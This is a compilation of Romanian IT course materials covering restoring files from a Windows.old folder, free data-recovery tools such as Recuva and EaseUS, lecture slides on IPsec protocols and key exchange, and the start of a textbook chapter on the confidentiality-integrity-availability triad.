folderul Public. De exemplu, acest folder conține emisiuni TV înregistrate pe computere care execută
Windows Media Center. Deschideți folderele din folderul Public pentru a găsi toate fișierele pe care
doriți să le păstrați. Apoi, copiați aceste fișiere într-o locație nouă care se află în afara structurii
folderului Windows.old.
 unitate:\Windows.old\Utilizatori\Numeutilizator

Majoritatea fișierelor personale se află în foldere care sunt etichetate pentru fiecare utilizator care a
făcut log on pe computer în Windows Vista.
Folderele utilizatorilor individuali
Majoritatea fișierelor personale se află în următoarea locație:
unitate:\Windows.old\Utilizatori\Numeutilizator
Acest folder conține următoarele foldere:
 unitate:\Windows.old\Utilizatori\Numeutilizator\Persoane de contact
 unitate:\Windows.old\Utilizatori\Numeutilizator\Desktop
 unitate:\Windows.old\Utilizatori\Numeutilizator\Documente
 unitate:\Windows.old\Utilizatori\Numeutilizator\Descărcări
 unitate:\Windows.old\Utilizatori\Numeutilizator\Preferințe
 unitate:\Windows.old\Utilizatori\Numeutilizator\Linkuri
 unitate:\Windows.old\Utilizatori\Numeutilizator\Muzică
 unitate:\Windows.old\Utilizatori\Numeutilizator\Imagini
 unitate:\Windows.old\Utilizatori\Numeutilizator\Jocuri salvate
 unitate:\Windows.old\Utilizatori\Numeutilizator\Căutări
 unitate:\Windows.old\Utilizatori\Numeutilizator\Video
De obicei, aceste foldere conțin majoritatea fișierelor personale importante din instalarea Windows.
Restabilirea fișierelor personale
Pentru a restabili fișierele personale din instalarea Windows anterioară în Windows Vista sau
Windows 7, urmați acești pași.
Pasul 1: Restabilirea emisiunilor TV înregistrate
Implicit, Windows Media salvează emisiunile TV înregistrate în folderul Înregistrare TV. Pentru a
restabili aceste fișiere, urmați acești pași:
1. Găsiți folderul Windows.old, apoi deschideți folderul următor:
Utilizatori\Public\Înregistrare TV
2. Faceți clic cu butonul din dreapta pe Înregistrare TV, apoi faceți clic pe Decupare.

3. Faceți clic pe Start , apoi faceți clic pe numele de utilizator din colțul din dreapta sus al
meniului Start.
13
4. Faceți clic cu butonul din dreapta pe folderul Video sau Fișierele mele video, apoi faceți clic
pe Lipire.
Windows mută fișierele cu emisiunile TV înregistrate în folderul Video.
Pasul 2: Restabilirea fișierelor personale
Pentru a muta folderele cu fișiere personale din instalarea anterioară în Windows Vista, urmați
acești pași:
1. Găsiți folderul Windows.old, apoi deschideți folderul următor:
Utilizatori\Numeutilizator
2. Apăsați CTRL+A pentru a selecta toate elementele din folder. Apoi, apăsați CTRL+X pentru
a muta elementele din folderul Utilizatori în clipboardul Windows Vista.

3. Faceți clic pe Start , apoi faceți clic pe numele de utilizator din colțul din dreapta sus al
meniului Start.
4. Faceți clic pe Lipire.
Windows mută folderele cu fișiere personale în contul de utilizator Windows Vista.
Pentru a muta folderele de fișiere personale din instalarea anterioară în Windows 7, urmați
acești pași:
1. Găsiți folderul Windows.old, apoi deschideți folderul următor:
Utilizatori\Numeutilizator
2. Faceți clic cu butonul din dreapta pe folderul Documente, apoi faceți clic pe Redenumire.
Redenumiți folderul Documentele mele.
3. Faceți clic cu butonul din dreapta pe folderul Muzică, apoi faceți clic pe Redenumire.
Redenumiți folderul Muzica mea.
4. Faceți clic cu butonul din dreapta pe folderul Imagini, apoi faceți clic pe Redenumire.
Redenumiți folderul Imaginile mele.
5. Apăsați și țineți apăsată tasta CTRL, apoi faceți clic pentru a selecta toate folderele din
folderul utilizatorului. Apoi, apăsați CTRL+X pentru a muta elementele din folderul
Utilizatori în clipboardul Windows 7.

6. Faceți clic pe Start , apoi faceți clic pe numele de utilizator din colțul din dreapta sus al
meniului Start.
7. Faceți clic pe Lipire.
Windows mută folderele cu fișiere personale în contul de utilizator Windows 7.
Restabilirea fișierelor și folderelor altor utilizatori
Dacă alți utilizatori au făcut log on pe computer în Windows Vista, urmați pașii din secțiunea
„Restabilirea fișierelor personale” pentru a restabili datele celorlalți utilizatori. Când efectuați

14
aceasta, este util să faceți log on în Windows Vista sau Windows 7 ca utilizator distinct, pentru
fiecare utilizator Windows Vista care are date pe computer. Acest lucru poate contribui la păstrarea
separată a datelor fiecărui utilizator în instalarea curentă de Windows.
Restabilirea altor fișiere și foldere din folderul Windows.old
După ce restabiliți toate folderele personale din instalarea Windows Vista, examinați folderul
Windows.old pentru a determina dacă există alte foldere care conțin date personale.
Important Asigurați-vă că ați mutat toate datele importante înainte de a șterge folderul
Windows.old.

2.2. Recuperarea datelor pierdute de formatare


Oricît de mult ne-ar place să le credem in siguranță, fisierele noastre sunt în permanență în
pericol de a fi pierdute. În funcție de informațiile de pe hard disk, o asemenea eventualitate poate
avea urmări dezastruoase. Cu toate acestea există metode de recuperare a informațiilor pierdute.
Chiar dacă nu ne pot garanta o recuperare totala, ele ne aduc o rază de speranță.
Recuperarea fișierelor șterse
Informațiile pot fi pierdute din mai multe motive: prezența unui virus, resetări accidentale ale
calculatorului, programe ce funcționează defectuos, neatenția utilizatorilor. Oricare ar fi cauzele,
informațiile trebuie recuperate. În unele cazuri poate fi mai ușor, în altele mai dificil.dacă Windows a
trimis în timpul ștergerii, fișierele în Recycle Bin, atunci acestea pot fi recuperate destul de ușor, prin
deschiderea Recycle Bin-ului, selectarea acestora și apăsarea butonului Restore. Dar dacă Recycle
Bin se golește atunci este mai complicat. De-abia atunci se poate spune că ele au fost șterse. Nu este
însă totul pierdut, deoarece se știe că fișierele nu sunt șterse fizic imediat.Dar în general, ca o măsură
de prevenire și securitate, se recomandă ca documentele și fișierele importante să fie ținute pe o
partiție separate, dar nu pe cea a sistemului de operare.
Atît timp cît locul unde a fost stocat fișierul nu a fost rescris, fișierele pot fi recuperate. Pentru
aceasta pot fi folosite mai multe programe, precum http://www.finalrecovery.com sau
http://www.bitmart.net. Acestea fac o analiza a discului ce conține fișierele șterse și identifică
fișierele recuperabile. De asemenea, mai pot fi utilizate și programe precum
www.executive.com/undelete/undelete.asp, Executive Software Undelete sau Norton Protected
Recycle Bin din pachetul www.symantec.com/sabu/sysworks/basic/features.html, Norton System
Works, care pot lucra în două moduri independente. În primul rînd acestea creează încă un Recycle
Bin, în care sunt mutate toate fișierele șterse direct. Atenție însă, acest lucru poate genera confuzii,
datorită faptului că spațiul disponibil pe disc nu mai este raportat corect. Astfel, dacă stergem unele
fișiere pentru a elibera spațiul, nu vom obține nimic decît dacă golim și al doilea Recycle Bin în care

15
acestea sunt mutate. În al doilea rînd, aceste programe conțin functii asemănătoare cu primele două,
care pot căuta pe disc fișierele șterseșsi le pot recupera în măsura posibilului.
Recuperarea partițiilor corupte
Există însă cazuri nefericite în care nici măcar aceste programe nu ne pot ajuta. În anumite
situații, destul de rare, o partiție poate fi coruptă și poate deveni neinteligibilă pentru sistemul de
operare. În aceste situații recuperarea datelor devine o problemă de noroc. Există unele programe ce
pot recupera informațiile, însă capacitatea acestora de a duce treaba la bun sfarșit depinde în foarte
mare măsură de gradul în care partiția este afectată. În plus, asemenea erori grave necesită
dezasamblarea calculatorului, scoaterea unității de disc și introducerea acesteia într-un calculator
funcțional.
Un astfel de program este Stellar Phoenix FAT & NTFS. Acesta conține funcții avansate care,
în cazul unei partiții corupte, scanează tot discul pentru a identifica partițiile, tipul de sistem de fișiere
și structura fișierelor. Din păcate însă, funcțiile de recuperare a fișierelor nu sunt disponibile decît în
varianta înregistrată a acestui program.
Există și soluții de recuperare a datelor care pot fi folosite prin butarea de pe un CD. Acestea
oferă avantajul unei diagnosticări rapide a problemelor și conțin programe care pot repara pagubele
produse. Site-ul www.ultimatebootcd.com conține o colecție de programe pentru diagnosticarea
problemelor. Astfel pe CD pot fi găsite programele oficiale de verificare a stării hard disk-ului, de la
Hitachi (IBM), Maxtor(Quantum), Western Digital, Seagate, Fujitsu, Samsung Aceste programe pot
repara anumite defecțiuni ale discurilor care le fac imposibil de citit. Sunt disponibile o mulțime de
alte programe de lucru cu partițiile, programe de Linux de recuperare a datelor, precum și o versiune
de antivirus ce poate rula în mod Dos. Imaginea ISO a acestui CD are o dimensiune de download de
34,8 MB.
Din păcate nici unul dintre aceste programe nu poate garanta o recuperare totală a datelor în
cazul nefericit al unei căderi a sistemului, însă sunt șanse destul de mari să iți poți salva datele.
Pentru orice eventualitate însă ar fi mai bine ca periodic să se facă un back-up al datelor esențiale. Nu
există metodă mai bună de asigurare a datelor decît copierea acestora pe mai multe medii.
Pentru aceasta pot fi folosite mai multe programe, unele dintre ele fiind capabile să copieze o
partiție cu totul. Un bun exemplu sunt www.symantec.com/sabu/ghost/ghost_personal, Norton Ghost
si www.powerquest.com/driveimage, PowerQuest Drive Image 7.

3. Descrierea programelor de recuperare


1. Recuva – este un program gratuit de recuperare a datelor pierdute. Caracteristicile lui sînt
următoarele:

16
 Interfață de utilizare simplă - doar clickăm 'Scan' și alegem fișierele pe care dorim să le
recuperăm
 Filtru pentru rezultate ușor de utilizat, bazat pe numele și tipul fișierului
 Windows simplu cum ar fi interfața cu Listă ori Arbore
 Poate fi rulată direct de pe un stick USB.
 Suportă sistemele de fișiere FAT12, FAT16, FAT32, exFAT, NTFS, NTFS5 , NTFS + EFS
 Recuperează fișiere de pe medii portabile (SmartMedia, Secure Digital, MemoryStick, Digital
cameras, Floppy disks, Jaz Disks, Sony Memory Sticks, Compact Flash cards, Smart Media
Cards, Secure Digital Cards, etc.)
 Recuperează fișiere de pe driver externe ZIP , Firewire and USB Hard drives
 Este rapid și foarte mic!
Exemplul de instalare și utilizare a programului este prezentat în Anexa 1.

2. Data Recovery Wizard Free


Cum se folosește Data Recovery Wizard Free pentru recuperarea datelor pierdute
EaseUS Data Recovery Wizard Free, un instrument sigur și efectiv de recuperare a datelor ne
furnizează cea mai bună experiență de recuperare a datelor. Doar cîțiva pași și datele sunt recuperate.
Notă: nu instalați pe discul cu date pierdute pentru a nu le suprascrie.

Flexibil, Precis și econom în timp

 Specificarea tipului fișierelor pentru recuperare înainte de scanare pentru precizarea


rezultatului

 Filtrează căutarea după numele fișierului, tipul, data și dimensiuni rapid și în scurt timp.

 Salveașă rezultatul precedent scanat și îl importează pentru arezuma recuperarea fără a ami
scana din nou.

 Preview înainte de a lua decizia de recuperare .

Ușor de utilizat și sigur

 O interfață pentru recuperare interactivă și prietenoasă utilizatorului.


 Doar 3 pași simpli pentru regăsirea datelor pierdute.
 Mai mult de 10 ani de experiență în recuperarea datelor, garantează un nivel înalt al calității
recuperării.
 Un program de recuperare al datelor foarte popular care a cîștigat încrederea a milioane de
utilizatori.
17
 Fără risc absolut.nu va provoca nici o stricăciune discului ori discului de memorie.

Metoda de recuperare ajută la restabilirea tuturor datelor pierdute


Trei metode de recuperare, concepute pentru diferite scenarii de pierderi de date, ajută la
restabilirea datelor dintre multe alte device-uri.
1# Deleted File Recovery – restabilesc fișierele cu numele lor original și calea.
2#Complete Recovery - Recuperează datele datorită formatării, reinstalării sistemului, power-
off,virus attack, partiție inaccesibilă etc.
3# Partition Recovery - Recuperarea datelor de pe partițiile șterse ori pierdute.
Exemplul de instalare și utilizare a programului este prezentat în Anexa 2.

18
Anexa 1

Etapele de încărcare, instalare și de lucru cu programul Recuva


Încărcarea programului pe calculatorul personal

Salvarea fișierelor programului pe calculator

Începutul Instalării programului Recuva, avem oportunitatea de a alege limba de instalare.

19
Selectarea opțiunilor suplimentare

Declanșarea instalării

Pasul final în instalarea programului


20
Declanșarea procesului de recuperare a informației, prin dublu click pe iconița de pe Desktop

Sistemul ne oferă posibilitatea de a preciza tipul de fișiere pentru restabilire

21
Începutul procesului de recuperare a informației

Sistemul întreabă unde se aflau fișierele


22
Declanșarea Scanării propriu - zise

Afișarea rezultatelor obținute în urma scanării. Selectăm fișierele care ne interesează să fie restabilite

23
Selectăm locația pentru recuperare

24
Afișarea rezultatului obținut de către sistem

25
Anexa 2

Procesul de instalare și lansare a programului Data Recovery Wizard


Salvarea fișierelor programului pe calculator

Setarea limbii pentru instalare

Instalarea programului

26
27
28
Modalitatea de lucru cu programul
 Pasul 1: alegerea modului de recuperare.

29
Se alege tipul fișierelor pierdute

Selectarea partiției

30
Scanarea fișierelor

Alegerea fișierelor pentru recuperare

Răspuns din partea sistemului

31
32
Rețele Vitual Private. IPsec

Internet Protocol Security (IPsec) - o stiva de protocoale pentru


securizarea comunicatiilor IP prin autentificarea si/sau criptarea
fiecarui pachet IP al fluxului de date.
Facilitati:
• IPsec include protocoale pentru stabilirea autentificarii mutuale intre
agenti la inceputul sesiunii si negocierea cheilor criptografice ce vor
fi utilizate in sesiune
• IPsec poate fi utilizat pentru protejarea fluxului de date intre doua
masini (masini client sau servere), intre o pereche de gateway-uri
securizate (rutere) sau intre un gateway securizat si o masina
gazda.
• Opereaza la nivelul 3 al modelului OSI. De notat ca alte sisteme de
securitate ca SSL, TLS si SSH opereaza la niveluri superioare ale
modelului OSI!

1
De ce IPsec?

• IPsec este flexibil deoarece opereaza la un nivel OSI inferior


• Complet transparent pentru aplicatii. Poate fi utilizat la protejarea
traficului deoarece aplicatiile nu trebuie sa fie proiectate pentru a
utiliza IPsec. Alte protocoale de nivel superior trebuie incorporate in
aplicatie.
Precursori:
• IPsec - successor al standardului ISO NLSP (Network Layer
Security Protocol). Protocolul NLSP s-a bazat pe protocolul de layer
3 SP3 care a fost publicat de NIST si realizat prin proiectul Secure
Data Network System (SDNS) de catre NSA.
• swIPe (Ioanidis si Blaze) – o implementare UNIX network-layer
security protocol pentru IP ce realizeaza autentificarea, integritatea
si confidentialitatea datagramelor IP, implementare ce utilizeaza un
protocol de incapsulare pentru a pastra compatibilitatea cu
infrastructura existenta in momentul aparitiei. Partea de
implementare care proceseaza pachetele sosite si cele plecate este
realizata integral in kernel; setarea parametrilor si manipularea
exceptiilor este gestionata de procesele din userspace.

2
Structura IPsec

IPsec utilizeza o serie de protocoale pentru a realiza diverse functii:


• Internet Key Exchange (IKE si IKEv2) pentru stabilirea Security
Association (SA), negocierea procoalelor si algoritmilor si
generarea cheilor de criptare si autentificare care sunt utilizate de
IPsec.

• Authentification Header (AH) pentru a realiza integritatea


conexiunii si autentificarea pentru datagramele IP cat si protectia
impotriva atacurilor prin replicare (replay attacks)

• Encapsulating Security Payload (ESP) pentru realizarea


confidentialitatii, autentificarea originii datelor, integritatea
conexiunii.

• Pachetele includ headerele: IP, ESP, AH si poate altele, cum ar fi


TCP sau UDP

• Lucreaza cu IPv4 si cu IPv6


3
Moduri de operare

Moduri de operare:
• Transport mode. Numai datele transportate de pachetul IP sunt
criptate si/sau autentificate. Rutarea este identica deoarece
headerul IP nu este modificat sau criptat. Cu toate acestea atunci
cand este utilizat header-ul de autentificare adresele IP nu pot fi
translatate, deoarece acesta va invalida valoarea hash. Nivelurile de
transport si aplicatie sunt intotdeauna securizate prin hash asa ca
acestea nu pot fi modificate in nici un fel (de ex. translatarea
numerelor de port). Un mod de incapsulare a mesajelor IPsec
pentru traversarea NAT a fost definit in documentele ce descriu
mecanismul NAT-T.

• Tunnel mode. In acest mod intregul pachet IP (datele si headerul IP)


este criptat si/sau autentificat. El este incapsulat intr-un nou pachet
IP cu un nou header IP. Acest mod este utilizat la crearea retelelor
private virtuale (Virtual Private Network) pentru comunicatia intre
retele (ex: intre rutere care leaga retele), comunicatia gazda-retea
(ex: remote user acces) si comunicatia gazda la gazda (ex: chat
privat).

4
Formatul pachetelor

Formatul pachetelor depinde de modul de operare:

Transport Mode Tunnel Mode

IP IP

ESP ESP

TCP IP

User Data TCP

User data

5
Header de autentificare

Authentication Header (AH) este membru al protocolului IPsec,


garanteaza integritatea conexiunii si autentificarea originii datelor
din pachete IP. Este gandit ca in viitor sa poata proteja impotriva
replay attacks utilizand tehnica de fereastra alunecatoare (sliding
window) si pierderea pachetelor vechi.

• AH protejaza datele din datagrama IP si toate campurile din


header exceptand campurile ce se modifica in timpul tranzitului.
Campurile din header neautentificate la IPv4 sunt: Type of
Service (ToS), Flags, Fragment Offset, TTL, Header Checksum

• AH opereaza direct in fata protocolului IP si are numarul 51 (in


asignarea IANA)

• AH se bazeaza pe o cheie cripografica realizata cu o functie hash

• Utilizeaza Security Parameter Index (SPI) pentru a identifica


asociatia de securitate, tip de cheie si algoritm, etc

6
ESP - Encapsulating Security Payload

ESP este partea IPsec care realizeaza autentificarea originii, protectia


integritatii si confidentialitatii pachetelor.
• ESP transporta pachetul criptat.

• ESP suporta configuratiile numai criptare sau numai autentificare


insa utilizarea criptarii fara autentificare este puternic descurajata
datorita nesigurantei.

• Spre deosebire de AH, ESP nu protejaza headerul pachetului IP. Cu


toate acestea in modul tunnel cand intreg pachetul IP original este
incapsulat cu un nou headet de pachet adaugat, protectia ESP se
produce la intreg pachetul IP (inclusiv headerul interior).

• ESP opereaza in fata IP si utilizeaza numarul de protocol IP 50


(IANA);

• Utilizarea standard ESP este pentru DES in mod Cipher Block


Chaining (CBC).
7
AH - Header de autentificare (format)

Structura pachetului AH
Next protocol Lungime rezervat
SPI
Numar secventa
Data autentificata (lungime variabila)
In care:
• Next protocol - numar ce identifica urmatorul protocol in payload
conform IANA;
• Lungime - lungimea portiunii data autentificata;
• SPI – identifica parametrul de securitate care in combinatie cu
adresa IP identifica SA implementata cu acest pachet;
• Numar secventa – un numar generat crescator utilizat pentru
prevenirea atacurilor replica
• Data autentificata – contine valoarea de verificarea integritatii (ICV)
necesara pentru autentificarea pachetului.

8
Format ESP

Structura header

SPI
Numar secventa
Payload data
Payload data Padding
Padding padlen next header
Data autentificata (lungime variabila)

In care:
• Payload data – datele ce vor fi transferate;
• Padding – utilizat pentru a completa dimensiunea unui bloc
• Padlen – marimea padding in octeti (max 255)
• Celelalte campuri au aceeasi semnificatie cu cele de la AH

9
Security Association

• Arhitectura IP security utilizeaza conceptul de Security Association (SA) ca


baza pentru a construi functiile de securitate in IP. SA este o colectie de
algoritmi si parametrii (ca o cheie) utilizati pentru criptarea si autentificarea
unui flux de date intr-o directie. La trafic bidirectional fluxul de date este
securizat cu o pereche SA
• Pentru a decide ce protectie va fi aplicata pentru un pachet care pleaca,
IPsec utilizeza SPI, index la Security Association DataBase (SADB)
impreuna cu adresa destinatie din header-ul pachetului. Ambele identifica
asociatia de securitate pentru acel pachet.
• O procedura similara este utilizata la pachetele care sosesc unde IPsec
culege cheile de verificare de la SADB
• Pentru multicast o SA este furnizata pentru un grup si este duplicata pentru
fiecare dintre receptorii autorizati ai grupului.
• Pot exista mai multe SA pentru un grup care utilizeaza SPI diferite,
permitand in acest mod multiple niveluri si setari ale securitatii in grup
• Fiecare transmitator poate avea SA multiple, fapt ce permite autentificarea,
pe cand receptorul poate stii numai ca cineva cunoaste cheile cu care au
fost trimise datele
• Standardele nu descriu cum este aleasa asocierea si asignarea la un grup,
ci presupune ca o parte responsabila face aceasta alegere.

10
IPsec si Firewall

Utilizari IPsec:
• Virtual Private Network
• Securitate Internet in general
IPsec si Firewall:
• IPsec rezolva doua mari probleme: autentificatrea end to end (o masina
comunica cu masina cu care crede ca comunica) si criptarea
(preintimpinarea atacurilor care asculta traficul).
• Nici unul dintre aceste lucruri nu este rezolvat de firewall. Firewall ajuta la
protejarea impotriva unor riscuri prezente in Internet fara autentificare si
criptare.
Concluzie: IPsec nu inlocuieste firewall si nici invers. Interesanta posibilitatea
de combinare a IPsec si firewall
• Controlul accesului poate fi aplicat la traficul criptat, in functie de sursa.
• Adresa IP sursa poate fi autentificata numai daca este legata de un
certificat.
• Traficul criptat poate utiliza diferite firewall-uri, insa este necesara
coordonarea politicilor.
• Cele mai bune filtre de pachete sunt eficiente indiferent daca au IPsec AH.
Firewall-urile aplicatie au o mai buna capacitate de verificare a sursei
utilizand IPsec AH, in comparatie cu increderea acordata (sau nu) implicit
pachetelor IP normale.
11
Probleme privind implementarea

La orice implementare este necesara analiza urmatoarelor aspecte:

• Cum cer aplicatiile protectie criptografica?

• Cum se poate verifica existenta lor?

• Cum mandateaza administratorul criptarea intre o masina si alte


parti ale retelei?

• Cum se face autorizarea?

12
Managementul cheilor

Intrebari:
• De unde vin cheile folosite de IPsec? Comunicatia IPsec SA.
• Se pot utiliza chei statice?
• Care sunt cerintele privind gestionarea cheilor?

Teoretic pot fi utilizate chei statice, au o multime de dezavantaje:


• Nu sunt complet aleatoare.
• Atacatorii pot lansa password guessing attack.
• Teoria si analiza istorica arata ca este o idee gresita sa se cripteze
prea multe informatii cu aceeasi cheie.
• Nu se poate utiliza protectia la replici cand se utilizeaza chei statice.
• Chiar daca este mai usor de administrat nu reprezinta o practica
recomandata.

13
Protectia la raspuns

• La stabilirea unei noi asocieri de securitate SA, sursa initializează


numaratorul de pachete cu valoarea zero ce va fi incrementata la
fiecare pachet emis. Valoarea va fi scrisa in campul numar secventa
din AH.
• In orice moment o masina poate fi repornita, se pierde numarul de
secventa curent si se restarteaza numararea de la 1.
• La atingerea valorii 232 -1 sursa trebuie să termine SA curentă si să
negocieze o nouă SA, cu o nouă cheie.
• Deoarece IP asigură un serviciu fără conexiune, IPSec recomandă
ca destinatarul să implementeze o fereastra de receptie W cu
valoarea implicită W=64. Limita superioară a ferestrei este
reprezentată de N numărul de secventă cel mai mare receptionat
pentru un pachet valid, iar limita inferioară este N – W + 1.
• La cheile statice replicile pot fi utilizate pentru atacarea
confidentialitatii prin ignorarea numarului de secventa.

14
Comentarii IPsec

• IPsec nu utilizeaza PKI, iar schimbul de chei inainte de stabilirea


conexiunii IPsec creaza probleme.

• IKE rezolva generarea unei chei simetrice pentru o sesiune IPsec,


dar fara PKI atacurile man-in-the-middle sunt posibile.

• IKE creaza Security Associations (SA).

• SA are o structura ce contine chei si alte informatii relevante despre


conexiune.

• IKE este in general un protocol de schimb chei.

• IPsec SA nu este echivalent IKE SA, insa IKE SA poate fi convertit la


IPsec SA.

• IKE ca toate protocoalele de criptare este complicat.

15
Internet Key Exchange (IKE)

• Internet Key Exchange (IKE sau IKEv2) este protocolul utilizat


pentru stabilirea asociatiei de securitate (SA) in IPsec. IKE utilizeaza
in schimbul de chei Deffie-Hellman pentru stabilirea unui secret
partajat sesiunii de la care cheia criptografica este derivata. O
tehnica cu cheie publica/privata (PKI) sau o cheie prepartajata se
utilizeaza pentru autentificarea mutuala a partilor in comunicare.

• Multe implementari constau intr-un demon IKE care ruleaza in user


space si stiva IPsec din kernel. Demonul din user space are acces
facil la informatiile de configurare cerute, ca adresele endpoint IPsec,
chei si certificate. Modulele Kernel pot procesa eficient pachetele cu
overhead minim.

16
IKE - filozofia de baza

• IKE este un protocol care asigura trei obiective pentru IPsec:


– Stabilirea politicii pentru o sesiune IKE
– Stabilirea unei chei pentru IKE SA
– Stabilirea de SA

• In proces sunt implicate doua parti Initiator si Responder

• Stabilirea unei chei pentru IKE SA se realizeaza in doua faze:


– Stabilirea unui control SA (cunoscuta ca faza 1 SA);
– Utilizare control SA pentru a crea un copil SA (child SA)
(cunoscuta si ca faza 2 SA).

• In acest moment datele IPsec sunt protejate prin child SA.

• Alt controlor de trafic poate utiliza control SA.


17
Procesarea pachetelor IPsec

Procesarea traficului IP pe arhitectura IPsec:


• Presupunem ca initial masina A nu a comunicat cu B
• O aplicatie oarecare de la A doreste sa trimita date la o masina B
prin UDP (1);
• Dupa receptie, implementarea IPsec de la A ca: tipul de protocol
(UDP), adresa destinarie (B) si alte informatii sunt mapate in Security
Policy Database (SPD) la o politica IPsec. In exemplu politica
mandateaza Encapsulating Security Payload (ESP) mod confidential
si management cheie automat.
• IKE protocol este lansat intre cele doua masini si cheile de sesiune
sunt stabilite (2);
• Terminarea cu succes a protocolului IKE este crearea unui SA care
defineste cheile, politica ESP si timp de viata SA.
• Pachetul este transformat (3) si transmis la B (4).

18
Procesare IPsec

Nivel aplicatie
IKE
(1) Nivel sistem operare

(2)
SPD Mesaj

SAD (4)
SA Transformare mesaj
(3)
Masina A Masina B

19
Flux protocol IKE

IKE faza 1
(main sau aggressive)

Initiator Responder

IKE SA IKE SA
IKE faza 2
Quick mode
IPsec SA1 IPsec SA1
IKE faza 2
Quick mode
IPsec SA2 IPsec SA2

20
Explicatii IKE protocol

Faza 1:
• Permite celor doua entitati sa creeze IKE SA
• IKE SA defineste cheile si politicile utilizate pentru stabilirea
procesarii datelor numita si IPspec SA
• Poate opera in 2 moduri:
– Main mode – sase mesaje care asigura protectia identitatii, adica initiatorul nu este expus
unui atacator care ataca activ sistemul
– Aggressive mode – trei mesaje, mai simplu dar mai putin sigur
• In ambele moduri acelasi rezultat – IKE SA
Faza 2 numita si quick mode;
• Utilizeaza IKE SA stabilit anterior pentru a crea un IPsec SA
• Opereaza cu trei mesaje: cerere, raspuns la cerere si confirmarea
raspunsului
• Pentru simplitate cheile si configuratia utilizata pentru definire IPsec
SA sunt generate din valorile schimbate intre parti
• Daca se doreste partile pot angaja alt schimb Diffie-Hellman
• Un singur IKE SA poate fi utilizat pentru a defini mai multe IPsec SA
simultan.

21
Aureliu Zgureanu. Bazele securității informaționale.

TEMA 1: INTRODUCERE ÎN SECURITATEA INFORMAŢIEI

Obiectivele temei:
 Familiarizarea cu obiectul de studiu al securității informațiilor.
 Caracterizarea atributelor securității informațiilor.
 Analiza claselor de amenințări la adresa condidențialității, integrității și disponibilității
informației.
Cuvinte-cheie:
securitatea informației, integritate,
măsuri organizatorice, disponobilitate,
măsuri legislative, autenticitate,
măsuri tehnice, non-repudiere,
monfidențialitate, amenințare.

1.1. Obiectul de studiu al securității informațiilor


Securitatea informației este un proces care are scopul de a asigura protecția informației de
acțiuni neautorizate la adresa acesteia, cum ar fi de exemplu: accesul neautorizat, folosirea,
dezvăluirea, întreruperea, modificarea sau distrugerea neautorizată a informației. Tehnicile de
asigurare a securităţii pot fi aplicate la orice informaţie, indiferent de natura ei, şi este important de
remarcat că informaţia are valoare în special atunci când este subiect al schimbului sau procesării,
deci tocmai atunci când este vulnerabilă în faţa unor părţi ce nu pot fi considerate de încredere.
Astfel, fără a exclude valoarea informaţiei stocate, valoarea informaţiei creşte evident în acțiunea de
schimb sau de procesare şi este evident că o informaţie complet izolată nu conduce la riscuri de
securitate foarte mari, dar în acelaşi timp nici nu poate aduce foarte multe beneficii având în general
valoare scăzută.
Trebuie de menționat că uneori “Securitatea informației” este confundată cu “Securitatea
informatică”, care de fapt este o ramură a informaticii ce se ocupă cu identificarea riscurilor
implicate de folosirea dispozitivelor informative, cum sunt calculatoarele, smartphone-urile, dar și
rețelele de calculatoare atât publice cât și private, și cu oferirea de soluții pentru înlăturarea acestor
riscuri. Acest termen însă caracterizează un domeniu mai îngust, calculatoarele fiind doar o
componentă a sistemelor informatice. Securitatea informației este dependentă nu numai de tehnica
de calcul, ci și de infrastructura conexă, cum ar fi sistemele de alimentare cu energie, apă, căldură,
aparate de aer condiționat, mijloacele de comunicare, personalul.
În același timp o noțiune mai generală este “Securitatea informațională” prin care înțelegem
protejarea atât a informației cât și a sistemelor informatice care asigură depozitarea, accesul și
transportul informațiilor.
1
Aureliu Zgureanu. Bazele securității informaționale.
Trebuie să fim conștienți de faptul că informaţia este un produs care, ca şi alte produse
importante rezultate din activitatea umană, are valoare şi în consecinţă, este necesar să fie protejată
corespunzător, iar aceasta se realizează prin:
 măsuri organizatorice, contra distrugerii datorate catastrofelor naturale, referitoare la
selecţia profesională a personalului, organizarea unui sistem de control a accesului,
organizarea păstrării şi utilizării suporturilor de informaţii;
 măsuri juridice, care cuprind documente normative care controlează şi reglementează
procesul prelucrării şi folosirii informaţiei;
 mijloace informatice, constituite din echipamente, programe şi tehnici de protecţie.
1.2. Atribute ale securității informațiilor
1.2.1. Triada confidențialității, integrității și disponibilității
Trei dintre obiectivele primare din domeniul securității informațiilor sunt confidențialitatea,
integritatea și disponibilitatea, cunoscute ca triada confidențialității, integrității și disponibilității –
CIA - (figura 1.1), care ne oferă un model prin intermediul căruia am putea să analizăm și să
discutăm diverse concepte de securitate.
Confidenţialitatea înseamnă asigurarea accesului la informaţii numai pe baza drepturilor de
acces aprobate ale persoanei, în acord cu nivelul de secretizare a informaţiei accesate şi a
permisiunii rezultate din aplicarea principiului nevoii de a cunoaşte (need-to-know). Cu alte
cuvinte, confidenţialitatea presupune interzicerea accesului neautorizat al persoanelor la informaţia
care nu le este destinată.
Confidențialitatea este o componentă necesară a vieții private și se referă la capacitatea
noastră de a ne proteja datele de cei care nu sunt autorizați să le vizualizeze. Confidențialitatea este
un concept care poate fi implementat la multe nivele ale unui proces.

Figura 1.1. Triada CIA

2
Aureliu Zgureanu. Bazele securității informaționale.
De exemplu, dacă luăm în considerare cazul unei persoane care retrage bani de la un ATM
(bancomat), persoana în cauză va încerca probabil să păstreze confidențialitatea numărului personal
de identificare (PIN) care îi permite, în combinație cu cardul, să extragă cash de la bancomat. În
plus, proprietarul ATM-ului va păstra, sperăm, confidențialitatea numărului de cont, a soldului și a
oricăror alte informații necesare pentru a le comunica băncii din care provin fondurile. Banca va
păstra confidențialitatea tranzacției cu ATM-ul și modificarea soldului în cont după retragerea
fondurilor. Dacă, în oricare moment al tranzacției, confidențialitatea este compromisă, urmările ar
putea fi negative pentru individ, proprietarul ATM-ului și bancă, în rezultat apărând ceea ce numim
breșă de securitate. Confidențialitatea poate fi compromisă de pierderea unui laptop care conține
date, de o persoană care se uită peste umăr în timp ce introducem o parolă, un atașament de e-mail
trimis persoanei greșite, un atacator care penetrează sistemele noastre sau alte probleme similare.
Integritatea este interdicţia modificării, prin ştergere sau adăugare, ori a distrugerii în mod
neautorizat a informaţiilor. Acesta înseamnă că datele să nu poată fi alterate sau să nu poată fi
modificate decât de persoane autorizate. Prin alterarea datelor se înţelege atât modificarea voit
maliţioasă, cât şi distrugerea acestora. Dar datele pot fi alterate, sau chiar pierdute/distruse, nu
numai ca urmare a unei acţiuni răuvoitoare, ci şi ca urmare a unei erori hardware, erori software,
erori umane sau a unei erori a sistemelor de securitate. În acest caz se impune să existe un plan de
recuperare şi refacere a datelor (existenţa unei copii de siguranţă).
